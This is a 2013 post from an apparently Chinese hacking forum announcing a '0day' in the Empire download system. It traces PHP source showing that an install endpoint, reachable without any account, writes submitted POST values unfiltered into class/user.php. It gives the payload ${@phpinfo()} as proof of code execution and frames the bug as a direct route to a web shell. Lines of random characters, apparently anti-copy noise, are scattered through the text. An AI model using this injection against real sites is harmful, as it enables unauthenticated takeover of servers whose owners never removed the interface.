找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2402|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
6 \4 s! }# f- [5 `. k8 J  a0 k# w' Y' `; y


- q8 V. x) o. j2 P. ]4 o: P7 n这是帝国的一套下载系统 如图* H1 h- X2 C$ k
ps(不需要任何账户和密码,直接写shell)

" ]# t; Y2 S: m4 u* }- m+ a

由于很多站是由于下载要整合discuz 等等一些论坛....
. ^# A  u; X. L! g0 K

" t. M" I3 d& S7 G3 k5 _

而帝国他又有一个万能接口,如图

) z0 c* L  D/ a+ @

( Z6 M1 W, N* r6 y$ s
7 T8 o$ O( L' H( n$ c' ~2 k. z

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码5 S- X" T% p8 @$ q2 B
% M1 ~7 h: b$ Z
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
0 b  J/ v, q5 J. C
& C8 J' m8 D7 M) ?在data/fun.php中的15行
& M* L- e4 S& F- F1 F% C7 k; u6 n
! w* M5 c6 N1 }3 b4 k" j我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
2 d, y7 J5 h& y, }: H6 Q
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干
2 l" b! q- }( J) Q9 Z7 `$ Z- V8 S# B! Z. t9 _# ^/ b3 ]
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
3 u: P9 D# t5 n. B
% {- [8 N' I. x( `2 k! }他将传进来的变量进行了切割,然后赋给了$filetext3 Y" C. w  J5 d

" n6 A& b9 n& O1 z: f' ^$ Y然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了
7 v) }, G) L# a$ e' M# h1 K2 P5 r! g! q: d) S- g
我们看看写入的结果,随便填一个

, Q$ q! b( _  D" d/ Q5 w) x( A! j. w
. k% V/ O; q, h3 O8 ]( h' q2 z  f* m
8 E# f' M3 K8 v9 w' h& V& S
( n  s$ z9 ^( t, \* \

" c3 e+ Y/ W' j. J7 G* }
4 A, w5 f# Y1 t+ m( {) j3 c
5 ?' q! _& E4 Z% c
2 g3 I2 m1 z  j  g3 h( ?

+ T5 ?! B+ F4 ?* c/ X) j' B4 {6 L& C! @% z; Y

# K  n9 d: Q. {* j
2 _: h3 q: U$ I2 q# a1 l3 A
. [' n3 l, e+ Z( K0 B" l& k" [7 ?3 J3 d+ n

. H& j- b" O+ g0 F
' _1 z; X4 D# }! ]6 P6 b9 O* ~- C% I7 K# @

* F7 i4 `5 T# `, \6 L
- [$ V2 W5 o, ~: {, K% g* L  L) j7 v( n
' q2 v, @+ F8 }5 X! D/ R% _

  ]& O  [2 O$ j. J$ X4 }+ @

所以我们淫荡点,写个${@phpinfo()}试试

: d: C+ T* s# Y) W$ p1 f

然后访问以下class/user.php这个文件2 R" n2 a2 F0 z
日了吧


5 s. a4 c! G3 [2 R& |! M

: Z8 A6 Q# T, ~* T6 e. r# L
  p- `2 O% S* E# f
. w; O3 y- R) S! d# b4 s
' p" _, [" s$ Q; r- U$ N

& {) \3 R4 _% o5 r

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表